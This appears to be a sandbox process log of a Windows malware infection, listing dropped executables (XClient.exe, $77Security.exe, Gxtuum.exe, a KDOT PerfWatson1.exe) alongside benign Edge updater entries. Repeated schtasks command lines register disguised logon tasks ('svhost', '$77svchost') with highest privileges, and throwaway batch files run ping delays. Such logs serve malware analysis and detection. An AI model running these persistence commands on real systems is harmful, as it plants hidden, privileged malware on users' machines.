"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --previous-version="132.0.2957.140" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6e0966a68,0x7ff6e0966a74,0x7ff6e0966a80
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Impacts.bat
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8JmbWji5E3Yw.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSkv0xgggIX8.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\AppData\Local\Temp\temp_16571.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KHOiRSC3GgYR.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\temp_16933.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"
C:\Users\Admin\AppData\Local\Temp\temp_16933.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\temp_16943.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16943.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REU2RkFENEQtNjM2RS00RUEzLTgxMzAtOTFEQTc4Q0JBQjIxfSIgdXNlcmlkPSJ7MzVEMjA0RkQtMjdEOC00RTk2LUE3MDItN0VEMjE5NTJEMkQ2fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9InswNUE2RUE2NS0xMzI2LTRBN0YtOUFFNS1BNjBBMzMzNUU5OEZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC4xOSI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxNiIgcGluZ19mcmVzaG5lc3M9IntCQzlGQTYwRC02RjQ5LTQzNkUtOEZDNS1CRkFBM0U4NTg1RjF9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjkwLjAuODE4LjY2IiBuZXh0dmVyc2lvbj0iMTMzLjAuMzA2NS41OSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIxIiBpc19waW5uZWRfc3lzdGVtPSJ0cnVlIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM3NzAzMTc3NjAzMzQwIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzI1MjcyNDM2IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUz
C:\Users\Admin\AppData\Local\Temp\temp_16933.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"
C:\Users\Admin\AppData\Local\Temp\temp_16571.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inzBSFcKmn5c.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\temp_16571.exe
"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s4jzXqOvEGfn.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZIe5oHJX8Suu.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5mY021yCVQh1.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KFbtkHMeAXJX.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5vr1M2usLXRc.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe
"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"
C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe
"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"
C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe
"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nUS2gPIhGtNN.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\Desktop\Files\svchost.exe
"C:\Users\Admin\Desktop\Files\svchost.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EWxfLIywvcEI.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3D63.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\c02a2c241a324dd19c2b6e4c88626ac7 /t 5616 /p 5944
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe
C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UkTqg95ZhAml.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Users\Admin\Desktop\Files\xxx.exe
"C:\Users\Admin\Desktop\Files\xxx.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8pVhhKXcKhQS.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YcMFuuFoZHsp.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xPlf2BI6iEkA.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8eC8nmLjGccv.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0MSPcy3lGfgs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GrTxXjz1jwCY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\Files\networkmanager.exe
"C:\Users\Admin\Desktop\Files\networkmanager.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V9DRgIUMHXOY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rVMlhZbJtSnx.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
